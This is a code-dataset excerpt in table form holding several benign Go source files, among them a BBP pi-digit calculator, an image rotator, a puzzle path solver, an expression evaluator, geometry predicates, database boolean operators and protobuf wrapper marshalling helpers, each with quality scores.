code stringlengths 114 1.05M | path stringlengths 3 312 | quality_prob float64 0.5 0.99 | learning_prob float64 0.2 1 | filename stringlengths 3 168 | kind stringclasses 1 value |
|---|---|---|---|---|---|
package pi
import (
"fmt"
"math"
"math/big"
"github.com/go-logr/logr"
)
const (
// The number of MR rounds to use when determining if the number is
// probably a prime. A value of zero will apply a Baillie-PSW only test
// and requires Go 1.8+.
DEFAULT_MILLER_RABIN_ROUNDS = 0
)
var (
TWO = big.NewInt(2)
)
// Calculator object holds the options to use when calculating fractional digits
// of pi.
type Calculator struct {
// The logr.Logger instance to use.
logger logr.Logger
// The number of Miller-Rabin rounds to use in Probably Prime calls.
millerRabinRounds int
}
// Defines the function signature for Calculator options.
type CalculatorOption func(*Calculator)
// Creates a new Calculator instance, applying the options provided.
func NewCalculator(options ...CalculatorOption) *Calculator {
calculator := &Calculator{
logger: logr.Discard(),
millerRabinRounds: DEFAULT_MILLER_RABIN_ROUNDS,
}
for _, option := range options {
option(calculator)
}
return calculator
}
// Change the logger instance used by the calculator instance.
func WithLogger(logger logr.Logger) CalculatorOption {
return func(c *Calculator) {
c.logger = logger
}
}
// Change the number of Miller-Rabin rounds used when determining if a number is
// prime.
func WithMillerRabinRounds(millerRabinRounds int) CalculatorOption {
return func(c *Calculator) {
c.millerRabinRounds = millerRabinRounds
}
}
// Returns the inverse of x mod y
func (calc *Calculator) invMod(x int64, y int64) int64 {
l := calc.logger.V(2).WithValues("x", x, "y", y)
l.Info("invMod: entered")
var u, v, c, a int64 = x, y, 1, 0
for {
q := v / u
t := c
c = a - q*c
a = t
t = u
u = v - q*u
v = t
if u == 0 {
break
}
}
a = a % y
if a < 0 {
a = y + a
}
l.Info("invMod: exit", "a", a)
return a
}
// Returns (a^b) mod m
func (c *Calculator) powMod(a int64, b int64, m int64) int64 {
l := c.logger.V(2).WithValues("a", a, "b", b, "m", m)
l.Info("powMod: entered")
var r int64 = 1
for {
if b&1 > 0 {
r = (r * a) % m
}
b = b >> 1
if b == 0 {
break
}
a = (a * a) % m
}
l.Info("powMod: exit", "r", r)
return r
}
// Return the next largest prime number that is greater than n.
func (c *Calculator) findNextPrime(n int64) int64 {
l := c.logger.V(2).WithValues("n", n)
l.Info("findNextPrime: entered")
var result int64
if n < 2 {
result = 2
} else {
var next *big.Int
if n%2 == 0 {
next = big.NewInt(n + 1)
} else {
next = big.NewInt(n + 2)
}
for ; !next.ProbablyPrime(c.millerRabinRounds); next = next.Add(next, TWO) {
}
result = next.Int64()
}
l.Info("findNextPrime: exit", "result", result)
return result
}
// Implements a BBP spigot algorithm to determine the nth and 8 following
// fractional decimal digits of pi at the specified zero-based offset, with
// the configured Calculator.
func (c *Calculator) BBPDigits(n uint64) string {
l := c.logger.V(1).WithValues("n", n)
l.Info("BBPDigits: enter")
N := int64(float64(n+21) * math.Log(10) / math.Log(2))
var sum float64 = 0
var t int64
for a := int64(3); a <= (2 * N); a = c.findNextPrime(a) {
vmax := int64(math.Log(float64(2*N)) / math.Log(float64(a)))
av := int64(1)
for i := int64(0); i < vmax; i++ {
av = av * a
}
var s, num, den, v, kq, kq2 int64 = 0, 1, 1, 0, 1, 1
for k := int64(1); k <= N; k++ {
t = k
if kq >= a {
for {
t = t / a
v--
if t%a != 0 {
break
}
}
kq = 0
}
kq++
num = (num * t) % av
t = (2*k - 1)
if kq2 >= a {
if kq2 == a {
for {
t = t / a
v++
if t%a != 0 {
break
}
}
}
kq2 -= a
}
den = (den * t) % av
kq2 += 2
if v > 0 {
t = c.invMod(den, av)
t = (t * num) % av
t = (t * k) % av
for i := v; i < vmax; i++ {
t = (t * a) % av
}
s += t
if s >= av {
s -= av
}
}
}
t = int64(c.powMod(10, int64(n), av))
s = (s * t) % av
sum = math.Mod(sum+float64(s)/float64(av), 1.0)
}
result := fmt.Sprintf("%09d", int(sum*1e9))
l.Info("BBPDigits: exit", "result", result)
return result
}
// Implements a BBP spigot algorithm to determine the nth and 8 following
// fractional decimal digits of pi at the specified zero-based offset, with
// a default Calculator instance.
func BBPDigits(n uint64) string {
return NewCalculator().BBPDigits(n)
} | v2/pi.go | 0.707203 | 0.404919 | pi.go | starcoder |
package imager
import (
"image"
"image/color"
"math"
)
// RotateImager
type RotateImager struct {
img image.Image
radian float64
}
// ColorModel
func (ri *RotateImager) ColorModel() color.Model {
return ri.img.ColorModel()
}
// Bounds
func (ri *RotateImager) Bounds() image.Rectangle {
rect := ri.img.Bounds()
x0 := rect.Dx() / 2
y0 := rect.Dy() / 2
x1, y1 := ri.rotatePoint(x0, y0, rect.Min.X, rect.Min.Y, ri.radian)
x2, y2 := ri.rotatePoint(x0, y0, rect.Max.X, rect.Min.Y, ri.radian)
x3, y3 := ri.rotatePoint(x0, y0, rect.Max.X, rect.Max.Y, ri.radian)
x4, y4 := ri.rotatePoint(x0, y0, rect.Min.X, rect.Max.Y, ri.radian)
return image.Rect(min(x1, x2, x3, x4), min(y1, y2, y3, y4), max(x1, x2, x3, x4), max(y1, y2, y3, y4))
}
// At
func (ri *RotateImager) At(x, y int) color.Color {
rect := ri.img.Bounds()
x0 := rect.Dx() / 2
y0 := rect.Dy() / 2
x1, y1 := ri.rotatePoint(x0, y0, x, y, -ri.radian)
return ri.img.At(x1, y1)
}
func (ri *RotateImager) rotatePoint(x0, y0 int, x, y int, r float64) (int, int) {
var r0 float64
if x == x0 && y == y0 {
return x, y
} else if x == x0 {
if y < y0 {
r0 = math.Pi / 2
} else {
r0 = math.Pi * 3 / 2
}
} else if y == y0 {
if x < x0 {
r0 = 0
} else {
r0 = math.Pi
}
} else {
r0 = math.Abs(math.Atan(float64(y-y0) / float64(x-x0)))
if x < x0 && y < y0 {
} else if x > x0 && y < y0 {
r0 = math.Pi - r0
} else if x > x0 && y > y0 {
r0 = math.Pi + r0
} else if x < x0 && y > y0 {
r0 = math.Pi*2 - r0
}
}
r1 := modRad(r0 + r)
for r1 > math.Pi*2 {
r1 = r1 - math.Pi*2
}
d := distance(x, y, x0, y0)
x1, y1 := 0, 0
if 0 < r1 && r1 < math.Pi/2 {
x1 = x0 - int(math.Cos(r1)*d)
y1 = y0 - int(math.Sin(r1)*d)
} else if math.Pi/2 < r1 && r1 < math.Pi {
r1 = math.Pi - r1
x1 = x0 + int(math.Cos(r1)*d)
y1 = y0 - int(math.Sin(r1)*d)
} else if math.Pi < r1 && r1 < math.Pi*3/2 {
r1 = r1 - math.Pi
x1 = x0 + int(math.Cos(r1)*d)
y1 = y0 + int(math.Sin(r1)*d)
} else if math.Pi*3/2 < r1 && r1 < math.Pi*2 {
r1 = math.Pi*2 - r1
x1 = x0 - int(math.Cos(r1)*d)
y1 = y0 + int(math.Sin(r1)*d)
}
return x1, y1
} | rotate_imager.go | 0.663015 | 0.612484 | rotate_imager.go | starcoder |
package solve
import (
gs "github.com/deanveloper/gridspech-go"
)
// PathsIter returns an channel of direct paths from start to end.
// These paths will:
// 1. never contain a goal tile that isn't start or end.
// 2. never make a path that would cause start or end to become invalid Goal tiles.
// 3. have the same Color as start.
func (g GridSolver) PathsIter(start, end gs.TileCoord, color gs.TileColor) <-chan gs.TileSet {
pathIter := make(chan gs.TileSet)
go func() {
defer close(pathIter)
startTile, endTile := *g.Grid.TileAtCoord(start), *g.Grid.TileAtCoord(end)
if !g.UnknownTiles.Has(start) && color != startTile.Data.Color {
return
}
if !g.UnknownTiles.Has(end) && color != endTile.Data.Color {
return
}
g.dfsDirectPaths(color, startTile, endTile, gs.NewTileCoordSet(start), pathIter)
}()
return pathIter
}
// we do not iterate in any particular order since it does not matter.
// this function will only create direct paths, aka ones which would satisfy
// a Goal tile.
func (g GridSolver) dfsDirectPaths(color gs.TileColor, prev, end gs.Tile, path gs.TileCoordSet, ch chan<- gs.TileSet) {
// possible next tiles include unknown tiles, and tiles of the target color
possibleNext := g.Grid.NeighborSetWith(prev.Coord, func(o gs.Tile) bool {
return !path.Has(o.Coord) && (g.UnknownTiles.Has(o.Coord) || o.Data.Color == color)
})
for _, next := range possibleNext.Slice() {
// prev's neighbors we _know_ are same color (including those that are part of the path)
prevNeighborsSameColor := g.Grid.NeighborSetWith(prev.Coord, func(o gs.Tile) bool {
knownSameColor := (o.Data.Color == color && !g.UnknownTiles.Has(o.Coord))
partOfPath := path.Has(o.Coord) || o.Coord == next.Coord
return knownSameColor || partOfPath
})
// make sure that we never have an invalid path
if prevNeighborsSameColor.Len() > 2 {
continue
}
if prev.Data.Type == gs.TypeGoal && prevNeighborsSameColor.Len() > 1 {
continue
}
if next.Data.Type == gs.TypeGoal && next.Coord != end.Coord {
continue
}
// we found a possible solution
if next == end {
// make sure the goal only has 1 neighbor we know is the same color
if end.Data.Type == gs.TypeGoal {
endNeighbors := g.Grid.NeighborSetWith(end.Coord, func(o gs.Tile) bool {
return (o.Data.Color == color && !g.UnknownTiles.Has(o.Coord)) || path.Has(o.Coord)
})
if endNeighbors.Len() > 1 {
continue
}
}
finalPath := path.ToTileSet(func(t gs.TileCoord) gs.Tile {
tileCopy := *g.Grid.TileAtCoord(t)
tileCopy.Data.Color = color
return tileCopy
})
next.Data.Color = color
finalPath.Add(next)
ch <- finalPath
continue
}
var nextPath gs.TileCoordSet
nextPath.Merge(path)
nextPath.Add(next.Coord)
// RECURSION
g.dfsDirectPaths(color, next, end, nextPath, ch)
}
} | solve/path.go | 0.727492 | 0.453564 | path.go | starcoder |
package puzzle
// parse and evaluate mathematical expressions
// precedence by power, division, multiplication, addition, and subtraction
import (
"fmt"
"math"
"strconv"
"strings"
"github.com/dockerian/go-coding/ds/stack"
u "github.com/dockerian/go-coding/utils"
)
var (
operators = []string{
"+",
"-",
"*",
"/",
"^",
}
operatorPriority = map[string]int{
"+": 1,
"-": 2,
"*": 3,
"/": 4,
"^": 5,
}
)
func eval(s string) (float64, error) {
e := NewEval(s)
return e.eval()
}
// Eval struct is a string stack implementation
type Eval struct {
expression string
operators stack.Str
operands stack.Str
}
// NewEval return a new instance of Eval struct
func NewEval(e string) *Eval {
return &Eval{
expression: e,
operators: stack.Str{},
operands: stack.Str{},
}
}
func (e *Eval) calc() (string, error) {
op, bv, av := e.operators.Pop(), e.operands.Pop(), e.operands.Pop()
if op == "" && av == "" {
return bv, nil
}
result, err := evaluate(op, av, bv)
u.Debug("calc: '%s' %s '%s' == %v \n", av, op, bv, result)
if err != nil {
return "", err
}
item := fmt.Sprintf("%f", result)
return item, nil
}
func (e *Eval) eval() (float64, error) {
tokens := strings.Split(e.expression, " ")
u.Debug("eval: '%v'\n", e.expression)
for _, token := range tokens {
priority, isOperator := operatorPriority[token]
peekToken := e.operators.Peek()
peekPriority, _ := operatorPriority[peekToken]
if isOperator {
if e.operators.IsEmpty() || peekPriority < priority {
e.operators.Push(token)
} else {
for !e.operators.IsEmpty() && priority < peekPriority {
result, err := e.calc()
if err != nil {
return 0.0, err
}
e.operands.Push(result)
}
e.operators.Push(token)
}
} else {
e.operands.Push(token)
}
}
for !e.operators.IsEmpty() {
result, err := e.calc()
if err != nil {
return 0.0, err
}
e.operands.Push(result)
}
peekValue := e.operands.Peek()
result, err := strconv.ParseFloat(peekValue, 64)
return result, err
}
func evaluate(op, a, b string) (float64, error) {
var result float64
if a == "" {
a = "0.0" // allow 1st operand to be empty
}
fa, err1 := strconv.ParseFloat(a, 64)
if err1 != nil {
return result, fmt.Errorf("cannot parse '%v' to float64: %v", a, err1)
}
fb, err2 := strconv.ParseFloat(b, 64)
if err2 != nil {
return result, fmt.Errorf("cannot parse '%v' to float64: %v", b, err2)
}
if _, ok := operatorPriority[op]; !ok {
return result, fmt.Errorf("unknown operator '%v'", op)
}
switch op {
case "+":
result = fa + fb
case "-":
result = fa - fb
case "*":
result = fa * fb
case "/":
result = fa / fb
case "^":
result = math.Pow(fa, fb)
default:
}
return result, nil
} | puzzle/eval.go | 0.682362 | 0.402979 | eval.go | starcoder |
package quadedge
import (
"github.com/go-spatial/geom"
)
/*
TrianglePredicate contains algorithms for computing values and predicates
associated with triangles. For some algorithms extended-precision
implementations are provided, which are more robust (i.e. they produce correct
answers in more cases). Also, some more robust formulations of some algorithms
are provided, which utilize normalization to the origin.
Author <NAME>
Ported to Go by <NAME>
The empty struct gives us a "static" TrianglePredicate namespace.
*/
type trianglePredicate struct{}
var TrianglePredicate trianglePredicate
/**
* Tests if a point is inside the circle defined by
* the triangle with vertices a, b, c (oriented counter-clockwise).
* This test uses simple
* double-precision arithmetic, and thus may not be robust.
*
* @param a a vertex of the triangle
* @param b a vertex of the triangle
* @param c a vertex of the triangle
* @param p the point to test
* @return true if this point is inside the circle defined by the points a, b, c
public static boolean isInCircleNonRobust(
Coordinate a, Coordinate b, Coordinate c,
Coordinate p) {
boolean isInCircle =
(a.x * a.x + a.y * a.y) * triArea(b, c, p)
- (b.x * b.x + b.y * b.y) * triArea(a, c, p)
+ (c.x * c.x + c.y * c.y) * triArea(a, b, p)
- (p.x * p.x + p.y * p.y) * triArea(a, b, c)
> 0;
return isInCircle;
}
*/
/*
IsInCircleNormalized Tests if a point is inside the circle defined by the
triangle with vertices a, b, c (oriented counter-clockwise). This test uses
simple double-precision arithmetic, and thus is not 100% robust. However, by
using normalization to the origin it provides improved robustness and
increased performance.
Based on code by J.R.Shewchuk.
a - a vertex of the triangle
b - a vertex of the triangle
c - a vertex of the triangle
p - the point to test
Returns true if this point is inside the circle defined by the points a, b, c
*/
func (_ trianglePredicate) IsInCircleNormalized(a geom.Pointer, b geom.Pointer, c geom.Pointer, p geom.Pointer) bool {
adx := a.XY()[0] - p.XY()[0]
ady := a.XY()[1] - p.XY()[1]
bdx := b.XY()[0] - p.XY()[0]
bdy := b.XY()[1] - p.XY()[1]
cdx := c.XY()[0] - p.XY()[0]
cdy := c.XY()[1] - p.XY()[1]
abdet := adx*bdy - bdx*ady
bcdet := bdx*cdy - cdx*bdy
cadet := cdx*ady - adx*cdy
alift := adx*adx + ady*ady
blift := bdx*bdx + bdy*bdy
clift := cdx*cdx + cdy*cdy
disc := alift*bcdet + blift*cadet + clift*abdet
return disc > 0
}
/**
* Computes twice the area of the oriented triangle (a, b, c), i.e., the area is positive if the
* triangle is oriented counterclockwise.
*
* @param a a vertex of the triangle
* @param b a vertex of the triangle
* @param c a vertex of the triangle
private static double triArea(Coordinate a, Coordinate b, Coordinate c) {
return (b.x - a.x) * (c.y - a.y)
- (b.y - a.y) * (c.x - a.x);
}
*/
/*
IsInCircleRobust Tests if a point is inside the circle defined by the triangle
with vertices a, b, c (oriented counter-clockwise). This method uses more
robust computation.
a - a vertex of the triangle
b - a vertex of the triangle
c - a vertex of the triangle
p - the point to test
Returns true if this point is inside the circle defined by the points a, b, c
*/
func (tp trianglePredicate) IsInCircleRobust(a geom.Pointer, b geom.Pointer, c geom.Pointer, p geom.Pointer) bool {
//checkRobustInCircle(a, b, c, p);
// return isInCircleNonRobust(a, b, c, p);
return tp.IsInCircleNormalized(a, b, c, p)
}
/**
* Tests if a point is inside the circle defined by
* the triangle with vertices a, b, c (oriented counter-clockwise).
* The computation uses {@link DD} arithmetic for robustness.
*
* @param a a vertex of the triangle
* @param b a vertex of the triangle
* @param c a vertex of the triangle
* @param p the point to test
* @return true if this point is inside the circle defined by the points a, b, c
public static boolean isInCircleDDSlow(
Coordinate a, Coordinate b, Coordinate c,
Coordinate p) {
DD px = DD.valueOf(p.x);
DD py = DD.valueOf(p.y);
DD ax = DD.valueOf(a.x);
DD ay = DD.valueOf(a.y);
DD bx = DD.valueOf(b.x);
DD by = DD.valueOf(b.y);
DD cx = DD.valueOf(c.x);
DD cy = DD.valueOf(c.y);
DD aTerm = (ax.multiply(ax).add(ay.multiply(ay)))
.multiply(triAreaDDSlow(bx, by, cx, cy, px, py));
DD bTerm = (bx.multiply(bx).add(by.multiply(by)))
.multiply(triAreaDDSlow(ax, ay, cx, cy, px, py));
DD cTerm = (cx.multiply(cx).add(cy.multiply(cy)))
.multiply(triAreaDDSlow(ax, ay, bx, by, px, py));
DD pTerm = (px.multiply(px).add(py.multiply(py)))
.multiply(triAreaDDSlow(ax, ay, bx, by, cx, cy));
DD sum = aTerm.subtract(bTerm).add(cTerm).subtract(pTerm);
boolean isInCircle = sum.doubleValue() > 0;
return isInCircle;
}
*/
/**
* Computes twice the area of the oriented triangle (a, b, c), i.e., the area
* is positive if the triangle is oriented counterclockwise.
* The computation uses {@link DD} arithmetic for robustness.
*
* @param ax the x ordinate of a vertex of the triangle
* @param ay the y ordinate of a vertex of the triangle
* @param bx the x ordinate of a vertex of the triangle
* @param by the y ordinate of a vertex of the triangle
* @param cx the x ordinate of a vertex of the triangle
* @param cy the y ordinate of a vertex of the triangle
public static DD triAreaDDSlow(DD ax, DD ay,
DD bx, DD by, DD cx, DD cy) {
return (bx.subtract(ax).multiply(cy.subtract(ay)).subtract(by.subtract(ay)
.multiply(cx.subtract(ax))));
}
public static boolean isInCircleDDFast(
Coordinate a, Coordinate b, Coordinate c,
Coordinate p) {
DD aTerm = (DD.sqr(a.x).selfAdd(DD.sqr(a.y)))
.selfMultiply(triAreaDDFast(b, c, p));
DD bTerm = (DD.sqr(b.x).selfAdd(DD.sqr(b.y)))
.selfMultiply(triAreaDDFast(a, c, p));
DD cTerm = (DD.sqr(c.x).selfAdd(DD.sqr(c.y)))
.selfMultiply(triAreaDDFast(a, b, p));
DD pTerm = (DD.sqr(p.x).selfAdd(DD.sqr(p.y)))
.selfMultiply(triAreaDDFast(a, b, c));
DD sum = aTerm.selfSubtract(bTerm).selfAdd(cTerm).selfSubtract(pTerm);
boolean isInCircle = sum.doubleValue() > 0;
return isInCircle;
}
public static DD triAreaDDFast(
Coordinate a, Coordinate b, Coordinate c) {
DD t1 = DD.valueOf(b.x).selfSubtract(a.x)
.selfMultiply(
DD.valueOf(c.y).selfSubtract(a.y));
DD t2 = DD.valueOf(b.y).selfSubtract(a.y)
.selfMultiply(
DD.valueOf(c.x).selfSubtract(a.x));
return t1.selfSubtract(t2);
}
public static boolean isInCircleDDNormalized(
Coordinate a, Coordinate b, Coordinate c,
Coordinate p) {
DD adx = DD.valueOf(a.x).selfSubtract(p.x);
DD ady = DD.valueOf(a.y).selfSubtract(p.y);
DD bdx = DD.valueOf(b.x).selfSubtract(p.x);
DD bdy = DD.valueOf(b.y).selfSubtract(p.y);
DD cdx = DD.valueOf(c.x).selfSubtract(p.x);
DD cdy = DD.valueOf(c.y).selfSubtract(p.y);
DD abdet = adx.multiply(bdy).selfSubtract(bdx.multiply(ady));
DD bcdet = bdx.multiply(cdy).selfSubtract(cdx.multiply(bdy));
DD cadet = cdx.multiply(ady).selfSubtract(adx.multiply(cdy));
DD alift = adx.multiply(adx).selfAdd(ady.multiply(ady));
DD blift = bdx.multiply(bdx).selfAdd(bdy.multiply(bdy));
DD clift = cdx.multiply(cdx).selfAdd(cdy.multiply(cdy));
DD sum = alift.selfMultiply(bcdet)
.selfAdd(blift.selfMultiply(cadet))
.selfAdd(clift.selfMultiply(abdet));
boolean isInCircle = sum.doubleValue() > 0;
return isInCircle;
}
*/
/**
* Computes the inCircle test using distance from the circumcentre.
* Uses standard double-precision arithmetic.
* <p>
* In general this doesn't
* appear to be any more robust than the standard calculation. However, there
* is at least one case where the test point is far enough from the
* circumcircle that this test gives the correct answer.
* <pre>
* LINESTRING
* (1507029.9878 518325.7547, 1507022.1120341457 518332.8225183258,
* 1507029.9833 518325.7458, 1507029.9896965567 518325.744909031)
* </pre>
*
* @param a a vertex of the triangle
* @param b a vertex of the triangle
* @param c a vertex of the triangle
* @param p the point to test
* @return true if this point is inside the circle defined by the points a, b, c
public static boolean isInCircleCC(Coordinate a, Coordinate b, Coordinate c,
Coordinate p) {
Coordinate cc = Triangle.circumcentre(a, b, c);
double ccRadius = a.distance(cc);
double pRadiusDiff = p.distance(cc) - ccRadius;
return pRadiusDiff <= 0;
}
*/
/**
* Checks if the computed value for isInCircle is correct, using
* double-double precision arithmetic.
*
* @param a a vertex of the triangle
* @param b a vertex of the triangle
* @param c a vertex of the triangle
* @param p the point to test
private static void checkRobustInCircle(Coordinate a, Coordinate b, Coordinate c,
Coordinate p)
{
boolean nonRobustInCircle = isInCircleNonRobust(a, b, c, p);
boolean isInCircleDD = TrianglePredicate.isInCircleDDSlow(a, b, c, p);
boolean isInCircleCC = TrianglePredicate.isInCircleCC(a, b, c, p);
Coordinate circumCentre = Triangle.circumcentre(a, b, c);
System.out.println("p radius diff a = "
+ Math.abs(p.distance(circumCentre) - a.distance(circumCentre))
/ a.distance(circumCentre));
if (nonRobustInCircle != isInCircleDD || nonRobustInCircle != isInCircleCC) {
System.out.println("inCircle robustness failure (double result = "
+ nonRobustInCircle
+ ", DD result = " + isInCircleDD
+ ", CC result = " + isInCircleCC + ")");
System.out.println(WKTWriter.toLineString(new CoordinateArraySequence(
new Coordinate[] { a, b, c, p })));
System.out.println("Circumcentre = " + WKTWriter.toPoint(circumCentre)
+ " radius = " + a.distance(circumCentre));
System.out.println("p radius diff a = "
+ Math.abs(p.distance(circumCentre)/a.distance(circumCentre) - 1));
System.out.println("p radius diff b = "
+ Math.abs(p.distance(circumCentre)/b.distance(circumCentre) - 1));
System.out.println("p radius diff c = "
+ Math.abs(p.distance(circumCentre)/c.distance(circumCentre) - 1));
System.out.println();
}
}
}
*/ | planar/triangulate/quadedge/trianglepredicate.go | 0.923825 | 0.736827 | trianglepredicate.go | starcoder |
package operator
import (
"github.com/matrixorigin/matrixone/pkg/container/nulls"
"github.com/matrixorigin/matrixone/pkg/container/vector"
"github.com/matrixorigin/matrixone/pkg/vm/process"
)
func ColAndCol(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
lvs, rvs := lv.Col.([]bool), rv.Col.([]bool)
n := len(lvs)
vec, err := proc.AllocVector(lv.Typ, int64(n)*1)
if err != nil {
return nil, err
}
col := make([]bool, len(lvs))
for i := 0; i < len(lvs); i++ {
col[i] = lvs[i] && rvs[i]
}
nulls.Or(lv.Nsp, rv.Nsp, vec.Nsp)
vector.SetCol(vec, col)
return vec, nil
}
func ColAndConst(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
lvs, rvs := lv.Col.([]bool), rv.Col.([]bool)
n := len(lvs)
vec, err := proc.AllocVector(lv.Typ, int64(n)*1)
if err != nil {
return nil, err
}
rb := rvs[0]
col := make([]bool, len(lvs))
for i := 0; i < len(lvs); i++ {
col[i] = lvs[i] && rb
}
nulls.Or(lv.Nsp, rv.Nsp, vec.Nsp)
vector.SetCol(vec, col)
return vec, nil
}
func ColAndNull(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
lvs := lv.Col.([]bool)
n := len(lvs)
vec, err := proc.AllocVector(lv.Typ, int64(n)*1)
if err != nil {
return nil, err
}
col := make([]bool, len(lvs))
for i := 0; i < len(lvs); i++ {
nulls.Add(vec.Nsp, uint64(i))
}
vector.SetCol(vec, col)
return vec, nil
}
func ConstAndCol(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
return ColAndConst(rv, lv, proc)
}
func ConstAndConst(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
lvs, rvs := lv.Col.([]bool), rv.Col.([]bool)
vec := proc.AllocScalarVector(lv.Typ)
vector.SetCol(vec, []bool{lvs[0] && rvs[0]})
return vec, nil
}
func ConstAndNull(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
return proc.AllocScalarNullVector(lv.Typ), nil
}
func NullAndCol(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
return ColAndNull(rv, lv, proc)
}
func NullAndConst(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
return ConstAndNull(rv, lv, proc)
}
func NullAndNull(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error) {
return proc.AllocScalarNullVector(lv.Typ), nil
}
func InitFuncMap() {
InitAndFuncMap()
InitOrFuncMap()
InitXorFuncMap()
InitNotFuncMap()
InitEqFuncMap()
InitGeFuncMap()
InitGtFuncMap()
InitLeFuncMap()
InitLtFuncMap()
InitNeFuncMap()
}
type AndFunc = func(lv, rv *vector.Vector, proc *process.Process) (*vector.Vector, error)
var AndFuncMap = map[int]AndFunc{}
var AndFuncVec = []AndFunc{
ColAndCol, ColAndConst, ColAndNull,
ConstAndCol, ConstAndConst, ConstAndNull,
NullAndCol, NullAndConst, NullAndNull,
}
func InitAndFuncMap() {
for i := 0; i < len(AndFuncVec); i++ {
AndFuncMap[i] = AndFuncVec[i]
}
}
func GetTypeID(vs *vector.Vector) int {
if vs.IsScalar() {
if vs.IsScalarNull() {
return 2
}
return 1
}
return 0
}
func And(vectors []*vector.Vector, proc *process.Process) (*vector.Vector, error) {
lv := vectors[0]
rv := vectors[1]
lt, rt := GetTypeID(lv), GetTypeID(rv)
vec, err := AndFuncMap[lt*3+rt](lv, rv, proc)
if err != nil {
return nil, err
}
return vec, nil
} | pkg/sql/plan2/function/operator/and.go | 0.52829 | 0.44071 | and.go | starcoder |
package types
func NewPopulatedStdDouble(r randyWrappers, easy bool) *float64 {
v := NewPopulatedDoubleValue(r, easy)
return &v.Value
}
func SizeOfStdDouble(v float64) int {
pv := &DoubleValue{Value: v}
return pv.Size()
}
func StdDoubleMarshal(v float64) ([]byte, error) {
size := SizeOfStdDouble(v)
buf := make([]byte, size)
_, err := StdDoubleMarshalTo(v, buf)
return buf, err
}
func StdDoubleMarshalTo(v float64, data []byte) (int, error) {
pv := &DoubleValue{Value: v}
return pv.MarshalTo(data)
}
func StdDoubleUnmarshal(v *float64, data []byte) error {
pv := &DoubleValue{}
if err := pv.Unmarshal(data); err != nil {
return err
}
*v = pv.Value
return nil
}
func NewPopulatedStdFloat(r randyWrappers, easy bool) *float32 {
v := NewPopulatedFloatValue(r, easy)
return &v.Value
}
func SizeOfStdFloat(v float32) int {
pv := &FloatValue{Value: v}
return pv.Size()
}
func StdFloatMarshal(v float32) ([]byte, error) {
size := SizeOfStdFloat(v)
buf := make([]byte, size)
_, err := StdFloatMarshalTo(v, buf)
return buf, err
}
func StdFloatMarshalTo(v float32, data []byte) (int, error) {
pv := &FloatValue{Value: v}
return pv.MarshalTo(data)
}
func StdFloatUnmarshal(v *float32, data []byte) error {
pv := &FloatValue{}
if err := pv.Unmarshal(data); err != nil {
return err
}
*v = pv.Value
return nil
}
func NewPopulatedStdInt64(r randyWrappers, easy bool) *int64 {
v := NewPopulatedInt64Value(r, easy)
return &v.Value
}
func SizeOfStdInt64(v int64) int {
pv := &Int64Value{Value: v}
return pv.Size()
}
func StdInt64Marshal(v int64) ([]byte, error) {
size := SizeOfStdInt64(v)
buf := make([]byte, size)
_, err := StdInt64MarshalTo(v, buf)
return buf, err
}
func StdInt64MarshalTo(v int64, data []byte) (int, error) {
pv := &Int64Value{Value: v}
return pv.MarshalTo(data)
}
func StdInt64Unmarshal(v *int64, data []byte) error {
pv := &Int64Value{}
if err := pv.Unmarshal(data); err != nil {
return err
}
*v = pv.Value
return nil
}
func NewPopulatedStdUInt64(r randyWrappers, easy bool) *uint64 {
v := NewPopulatedUInt64Value(r, easy)
return &v.Value
}
func SizeOfStdUInt64(v uint64) int {
pv := &UInt64Value{Value: v}
return pv.Size()
}
func StdUInt64Marshal(v uint64) ([]byte, error) {
size := SizeOfStdUInt64(v)
buf := make([]byte, size)
_, err := StdUInt64MarshalTo(v, buf)
return buf, err
}
func StdUInt64MarshalTo(v uint64, data []byte) (int, error) {
pv := &UInt64Value{Value: v}
return pv.MarshalTo(data)
}
func StdUInt64Unmarshal(v *uint64, data []byte) error {
pv := &UInt64Value{}
if err := pv.Unmarshal(data); err != nil {
return err
}
*v = pv.Value
return nil
}
func NewPopulatedStdInt32(r randyWrappers, easy bool) *int32 {
v := NewPopulatedInt32Value(r, easy)
return &v.Value
}
func SizeOfStdInt32(v int32) int {
pv := &Int32Value{Value: v}
return pv.Size()
}
func StdInt32Marshal(v int32) ([]byte, error) {
size := SizeOfStdInt32(v)
buf := make([]byte, size)
_, err := StdInt32MarshalTo(v, buf)
return buf, err
}
func StdInt32MarshalTo(v int32, data []byte) (int, error) {
pv := &Int32Value{Value: v}
return pv.MarshalTo(data)
}
func StdInt32Unmarshal(v *int32, data []byte) error {
pv := &Int32Value{}
if err := pv.Unmarshal(data); err != nil {
return err
}
*v = pv.Value
return nil
}
func NewPopulatedStdUInt32(r randyWrappers, easy bool) *uint32 {
v := NewPopulatedUInt32Value(r, easy)
return &v.Value
}
func SizeOfStdUInt32(v uint32) int {
pv := &UInt32Value{Value: v}
return pv.Size()
}
func StdUInt32Marshal(v uint32) ([]byte, error) {
size := SizeOfStdUInt32(v)
buf := make([]byte, size)
_, err := StdUInt32MarshalTo(v, buf)
return buf, err
}
func StdUInt32MarshalTo(v uint32, data []byte) (int, error) {
pv := &UInt32Value{Value: v}
return pv.MarshalTo(data)
}
func StdUInt32Unmarshal(v *uint32, data []byte) error {
pv := &UInt32Value{}
if err := pv.Unmarshal(data); err != nil {
return err
}
*v = pv.Value
return nil
}
func NewPopulatedStdBool(r randyWrappers, easy bool) *bool {
v := NewPopulatedBoolValue(r, easy)
return &v.Value
}
func SizeOfStdBool(v bool) int {
pv := &BoolValue{Value: v}
return pv.Size()
}
func StdBoolMarshal(v bool) ([]byte, error) {
size := SizeOfStdBool(v)
buf := make([]byte, size)
_, err := StdBoolMarshalTo(v, buf)
return buf, err
}
func StdBoolMarshalTo(v bool, data []byte) (int, error) {
pv := &BoolValue{Value: v}
return pv.MarshalTo(data)
}
func StdBoolUnmarshal(v *bool, data []byte) error {
pv := &BoolValue{}
if err := pv.Unmarshal(data); err != nil {
return err
}
*v = pv.Value
return nil
}
func NewPopulatedStdString(r randyWrappers, easy bool) *string {
v := NewPopulatedStringValue(r, easy)
return &v.Value
}
